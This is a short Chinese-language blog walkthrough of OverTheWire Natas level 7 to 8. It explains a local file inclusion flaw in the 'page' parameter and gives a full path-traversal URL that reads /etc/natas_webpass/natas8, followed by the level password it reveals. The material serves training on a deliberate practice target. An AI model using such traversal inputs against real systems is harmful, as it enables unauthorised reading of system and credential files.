Natas Level 7 → Level 8
一進入網頁的畫面:
Home 的話,網址會變成 xxxxx/?page=home
About 的話,網址會變成 xxxxx/?page=about
點選檢視原始碼,看到了提示:
<!-- hint: password for webuser natas8 is in /etc/natas_webpass/natas8 -->
而錯誤的使用參數的方式,容易造成本地讀取的漏洞
讓我們更改網址,在網址後加上:一大堆的 ../ 讓路徑回到根目錄
回到根目錄後,加上提示的路徑
http://natas7.natas.labs.overthewire.org/index.php/index.php?page=../../../../../../etc/natas_webpass/natas8
將將,成功獲得密碼囉!
Password: DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe
沒有留言:
張貼留言